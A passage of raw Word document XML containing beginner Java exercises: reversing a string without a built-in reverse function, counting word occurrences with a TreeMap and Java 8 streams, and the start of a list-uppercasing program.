        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="344" w:name="_Toc196307824"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="00445B2A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reverse String without using reverse function (Use brute force approach)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="344"/>
    </w:p>
    <w:p w14:paraId="4AA79DE9" w14:textId="2E6B3B28" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00061DEE">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00BE5425" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to reverse String without using reverse function (Use brute force approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B61C026" w14:textId="3CD4FCB3" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F158CB0" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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everseString</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8C2FF27" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC32C06" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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reverse</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in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97CA623" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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reverse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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFE8341" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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n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7FE15BA" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            reverse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n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harA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Appending each character from end to start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7994547D" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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A7A2A08" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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reversed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB6107" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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8B62782" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F165129" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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6346ECF" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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original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Siddhant"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448BB7AB" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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reverse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evers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original</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F11E500" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B0E96" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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Original String: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original</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBB654F" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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Reversed String: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eversed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492A7937" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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901998C" w14:textId="5C049642" w:rsidR="00445B2A" w:rsidRPr="00CE4B95"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1B62381A" w14:textId="77777777" w:rsidR="00445B2A" w:rsidRPr="00CE4B95" w:rsidRDefault="00445B2A" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0919EC68" w14:textId="77777777" w:rsidR="00D7512B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D7512B" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05E02E99" w14:textId="77777777" w:rsidR="00D7512B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D7512B" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EAE9D98" w14:textId="77777777" w:rsidR="00D7512B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D7512B" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E205509" w14:textId="77777777" w:rsidR="00D7512B" w:rsidRPr="00CE4B95" w:rsidRDefault="00D7512B" w:rsidP="00445B2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57C4963D" w14:textId="0DC15D28" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="345" w:name="_Toc196307825"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program –</w:t>
      </w:r>
      <w:r w:rsidR="005073CC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> C</w:t>
      </w:r>
      <w:r w:rsidR="00C9479A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ount </w:t>
      </w:r>
      <w:r w:rsidR="005073CC" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">of each word </w:t>
      </w:r>
      <w:r w:rsidR="008E2B25" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>in a</w:t>
      </w:r>
      <w:r w:rsidR="00C9479A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="345"/>
    </w:p>
    <w:p w14:paraId="2F6DB44A" w14:textId="47AAE03B" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="530A60F5"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p>
    <w:p w14:paraId="50367CAE"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88"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555A0BB5"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TreeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7FF930"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functio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Function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A87AFDC"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ollectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6272437E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549417EE"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5066F986"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> * @author Siddhant Patni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197F7162"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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492D7F10"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WordCou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02F0AB7" w14:textId="638D8F52"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BAB49F"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findWordCoun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in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0AFFCB3"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ordCount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reeMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&l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hanged to TreeMap for sorted output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7E2516"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14619077"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ord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n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LowerCas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pli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W+"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEFE60A"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wor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ord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7591267"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wor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Empt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F23F487"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xml:space="preserve">                wordCoun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wor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ordCoun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OrDefaul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wor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1168A34E"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64DAD04"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CF36FD0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42152DB1"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Word Occurrences (Basic Approach):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4186C2CE"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xml:space="preserve">        wordCoun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orEac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v</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k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g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v</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC3B11"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6A2DA09"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50936376"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findWordCountUsingStream</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in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15B77B0"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o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ordFrequenc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LowerCas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pli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W+"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0B8243"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il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s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Empty</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9130AF"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llec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ollecto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roupingBy</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Func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dentit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reeMap</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ollecto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unting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76059C96"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50551FCD"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Word Occurrence (Java 8 Stream):"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB1D84E"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xml:space="preserve">        wordFrequenc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orEac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v</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k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g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v</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC42A8F"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9A1A476"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792F2E16"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207FF6D"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inpu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1 w2 w2 w3 w3 w4"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E3A1EC"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Inpu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nput</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC792DB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4259B745"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xml:space="preserve">        findWordCou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put</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D8B87F" w14:textId="77777777"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xml:space="preserve">        findWordCountUsingStrea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put</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552B4BA9" w14:textId="115E148B"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EF05518" w14:textId="6146DDE1" w:rsidR="00F2494F" w:rsidRPr="00CE4B95"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3C62066F" w14:textId="77777777" w:rsidR="00F2494F" w:rsidRPr="00CE4B95" w:rsidRDefault="00F2494F" w:rsidP="00F2494F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46797D67" w14:textId="300AEBE6" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="346" w:name="_Toc196307826"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00AF3117" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Make all elements to Uppercase and create new ArrayList</w:t>
      </w:r>
      <w:bookmarkEnd w:id="346"/>
    </w:p>
    <w:p w14:paraId="3DCCBC5F" w14:textId="257B9AEB" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00211824">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00382B98" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a java 8 program to make all elements of the list to uppercase and create a new ArrayList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72636E30" w14:textId="77777777" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37063C" w14:textId="77777777" w:rsidR="00A604CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A604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878604"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
